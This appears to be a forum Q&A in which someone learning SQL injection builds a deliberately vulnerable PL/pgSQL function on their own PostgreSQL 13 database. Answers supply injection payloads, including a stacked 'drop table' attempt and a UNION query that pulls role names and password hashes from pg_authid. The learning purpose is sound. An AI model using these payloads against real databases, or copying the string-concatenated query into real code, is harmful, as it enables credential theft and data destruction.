# I'm trying to make an SQL injection in my own function in PostgreSQL 13

Tags: postgresql, functions, plpgsql, sql-injection

Just for learning purposes, I'm trying to create a function using PLPGSQL and make an SQL injection on it. I recently learned about `format`, `USING` and `quote_literal` and `quote_indent`, so I'm good about avoiding an SQL injection. What I'm trying to do is create a function that allows an SQL injection (i.e. a `drop table`).

So I wrote this:

```
create or replace function badfunc(tablename text, identifier int4)
returns setof character varying as $$
declare
    query text;
begin
    query := 'select full_name from ' || $1 || ' where re = ' || $2 ||'';
    raise notice 'query: %', query;
    return query execute query;
end;
$$ language 'plpgsql';
```

But when I execute this function with `select badfunc('; drop table tb_students;', 1001);` I get this error:

```
[42601] ERROR: syntax error at or near ";" where: function PL/pgSQL badfunc(text,integer) linha 7 in RETURN QUERY
```

So I think that's not how it is done. How can I achieve this SQL injection?

Answer (score 1):

You have to make it a valid SQL statement:

```
SELECT badfunc('(VALUES ('done')) AS x(fullname); drop table tb_students; --', 1001);
```

Comment: Great, I tried your code, but it doesn't work. But I get what you said, I need a valid SQL statement. I changed the second argument of the function to 'text', and them I ran `SELECT badfunc('tb_students', '1001; drop table tb_students');`. This way, the dynamic query becomes `select name from tb_students where re = 1001; drop table tb_students; --`. And now I get a new error: `[42P11] ERROR: cannot open multi-query plan as cursor`

Comment: Then you have to think of a more complicated exploit that does not include a `;`.

Answer (score 1):

PostgreSQL's internal restrictions block you from doing multistatement injections in this case.  You will perhaps have to settle for data leaks.

```
 SELECT badfunc('tb_students', '1001 union all select concat(rolname,rolpassword) from pg_authid');
```

Comment: The `UNION` worked, but of course I cannot do a `drop table` with it. So, Postgres denies multistatement injections... is there other types of injection that Postgres doesn't have a countermeasure? How can I make a `drop table` with them?